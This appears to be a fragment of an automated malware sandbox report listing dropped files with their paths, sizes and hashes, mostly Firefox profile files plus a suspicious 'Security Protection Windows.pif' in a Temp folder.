SHA512ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91
-
Filesize
236KB
MD534ab20a76646b53b692fd8fb5b28ae45
SHA19e7f6cc4c28394be5a331c92723cfd823143f639
SHA2569656e3c51eb43af1264a080c76fa6c87f01950489adda30532b9cd317eb0b54c
SHA512a172d81d867568d56e9146ebb7bbec6f08ab93f1414045e6c2aafcf72f45dedc20757d930d6e60f1c7dacab30a528c05422eb21d607e93f0760db9e1c8fb1268
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
1.0MB
MD5862c18d9ae0274490abff6a542b8a3e9
SHA1591e2c15f429355ad90c18aa70845342f3b6447d
SHA2567138a648e83aaa97eb31b98c9bfc4e9ccacde6d192e4f9b517572fe11335a724
SHA5129e5c1aa5fb6a6c0947bcba2a74e3c0d8691a4309c99bfba83928eebc44468af5b4b279f538516d9ed5d55a60feb630bb1356946adaec6981a170a4cb3b1a1f2c
-
Filesize
717B
MD5c1367c66f4a25a33a9e097d9f61ada54
SHA12b417f97e1a590f1ee031b18f9be9886cb21fe5a
SHA256cb515f73d136c1601909a99fab0a333a16ff7e02bdda1ced1afd7690e4a9b7f7
SHA512f48fe0625f0de7019d3d4b5e752eef9509756d7b76dce92c40cb9d4ba1d0ac23937fcaae56da02600d98dcddac7c3b4a3f3517b841fc122c88958da62daa2111
-
Filesize
717B
MD52434d3670041a353c3989b66c2810f25
SHA1e1b63652f81dc8127af6353a171ee5d12c24f5f6
SHA2563a1547145af94d2b1ee8c5a023e3b32bc401c46756a368cf0cc39a1a269f6add
SHA5123cf867459ac9c3bcd58c620c7f6a4f615053a5d28a922cf7c99e21d45a21dc28e9a14eebd5c9dd7eaad244e5fbf394d4eccbfab9102ed5f8e4659f946f979bf7
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
Filesize
18KB
MD5f3edff85de5fd002692d54a04bcb1c09
SHA14c844c5b0ee7cb230c9c28290d079143e00cb216
SHA256caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131
SHA512531d920e2567f58e8169afc786637c1a0f7b9b5c27b27b5f0eddbfc3e00cecd7bea597e34061d836647c5f8c7757f2fe02952a9793344e21b39ddd4bf7985f9d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52ec298d6d82f64ddf0bcd068555c2aec
SHA1dcddea5ceec2b16b4f9d45d071deea46852cbdd1
SHA256f18d8204aeee392ad4897d5391ca416902336477890b88416e76c83a50265a9a
SHA512cb05f53e4e45280f280e4fb7302c489780e6ec68cd6f7e68b79f1fd327468a7484823de398ac321083aea5860dca56a777cf4cf829d99cb46b282cf863daa408
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56fd9f58421e79a16a5ba1edd85f4e7e6
SHA1824443edb374f0f45abff866e795ede1ecd7e557
SHA256081a4904eec27cad3c4446ab7341cba0e2bdab310226099fd9884ef68b6e1b6c
SHA512cbd060514ba4ea0fc269ab610fd210d680b372c75d3e633272ba0efc105dec4fd44816d2816fb359772e3c4db1f6a57b5ba24abf0c4211aaad39fa4e80ed9ba8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD565b53db2574e394595cb4fdaaec6f966
SHA17d386887c471f7dffe56534ad026bcf0641a2585
SHA256d65d3c9f396d73541d5acd96dc4e0d8b41fd305ff753efad381ea28baa633f9b
SHA512424d9d36702a76b0d2af69293de6d75504c1d5ec07bce9478388ce4a498b0558cad331aa53f2c5ff0522f1ff91677919bc0dfe283b1f6cfca1b833331892ce1b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD59bbdbef001aa9094d00dce68fe769021
SHA1678feba5fea7b4b708fc460adff6ec9457fcc582
SHA25632af4e107a2e6570ff75db8a025ab8189f25b4dce140b0d3555be5a4de5bb190
SHA5124c1d9ce43897715e83746dc7ddf558e7d8897cb4b375b6de07e5f209c7a31cc0ede8b41858182cefe769bd59251d8c7f31406fe7074d7d95530d1ffbe460890b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\abf917a2-da53-45d7-b5de-ed463386c065
Filesize10KB
MD556c7cbd2cb0ad9b0c942794c8e885500
SHA1f894976a9f4fd21f18c9413ab89e8a07fdf62d80
SHA256bbe34c9b0278882ba7f4c5a9aef8b06d021c07f05cedc860e3d0bf9af607e263
SHA512fc983540fc8256526418954b0439b7a6b2c93d57083bb88961ab4e9eca11fb4b07a29bc88285d0fbb1b301b5c9ead367f0107215c5c84b56f05e6f2924ecb02a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\ee979735-ab7a-4d29-9657-67cf17206b9d
Filesize745B
MD528e386eb459104aa7208e2a4a9a6de34
SHA142cffc5158eddef794aba0cfce509be433843819
SHA256a42b5daffcdc55002093fb7d0d80aeffdf154d223763389e615910a216e8cf2e
SHA51223727d19b530f5af56ebf17f4ee8b6c41b9199c7eb1f6ca4f6c565205ee99a8a0d10f74376e5e6aa007324c85f2a979742c5c01160672e8d8f3fad038a348691
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD5aaf5c83bce7bbbf3a9ed4aa0d03efaf5
SHA14c8952135132981739df5b7c2d6480e3d7d43205
SHA25666efdd7ec3fa7bb252fb2e0ce9ce0515cb45dc883cb08df2993640b2e0f47876
SHA5125ae1c0bd932dc14aca7812f8acb6bee07e54f585f3b7fc381db63c3f385d9ecdde710d7ea0e64b341d76c80fd18b266f482e5e39a7434e1cc290a344e5d6dcbe
-
Filesize
6KB
MD5f3e0243e794aff442ce61ceef100a1bf
SHA16910ed8bd903193fce4402c98b6fcde78f2b7d33
SHA256e08206111f17853ceba18945e09e190f4f22ca4c899aa21489d725c1bf399ea2
SHA5129e5baa0f6d057ced61565eeb46ab2d78ebf16b04d47e241ee696c800324ef6a993784544890a6292f18724dde4da62d0373e35ecb78fd812135d7dd92f1414e1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5755a812a94fcb2923b363fcc39e27f52
SHA1e9100c4b39b724ad9c25535518e410d00ff65e77
SHA256759d5c026a67ec00f10bbd75df859fc0874867d0a89f19caacbbb045ee52a009
SHA51269f4c15f44e594101632ae32ec3f12064eed3883a8bcd2eaa3dffa0c6a141f8d533c32cd32a032c87bcea3a88b56471754195447fdf1a9b90b22a60c63c2bdd7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD5bece0acf9d7f19d01c7943c54d2ad372
SHA1aef59ca4b0fe97f32db128e103bfb98aee3b5e29
SHA256ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
SHA512105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b
-
Filesize
526KB
MD58ff8554b369f49ab17c0c588dccc7c41
SHA1701061a9a9ed8674587bfc51d8bcbf9ebf893c1b
SHA256ac0655d5bccf2669297a08564c1c98f428bbda7e5a4d7bb5215fef06b23e9881
SHA5128380c30f664b4c28334db1d315dbb62ef4bdc6a190c29d0f79eb2e2baed5bc8f5c3ff0c5ea3421026b97c58dd53144e684d124118edba456d11e1368b54b036a
-
Filesize
1.8MB
MD509e83a87eb8606e9f84a6a78349a615a
SHA1d294d80666e04fb6229ed8c0d849ccce2ebbf881
SHA256dc274be4181801a3b27036514f89ca8afc964930ba57afc5f99e86b4deff4b79
SHA512b1d6bb5e1e7ec84afe40d41ed0df31e2b0d74167d784581513a3bcbc7943742bd4ef9706bf2f691315ecfb57a1475d21077ebbc5eff9d1c5f29f6475b5dd717c
-
\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
Filesize1.3MB
MD508cff083585794c9ce26585faa7c8df4
SHA1c9aed53641e8f36e9a590af5c62ba434f9d4203a
SHA2569d61713812b8af616f33f88f5fb8ba98bbdef9ab5e33229d402a4ba4e6974e97
SHA512f76cbd115ebec6b00fe04bc2029d33552bfda7d4f909543e37787804f2279cc3f8f5234215192c1a74102a772a9806a0fccc7a05b4e1aeec7ddacd7c084c85ba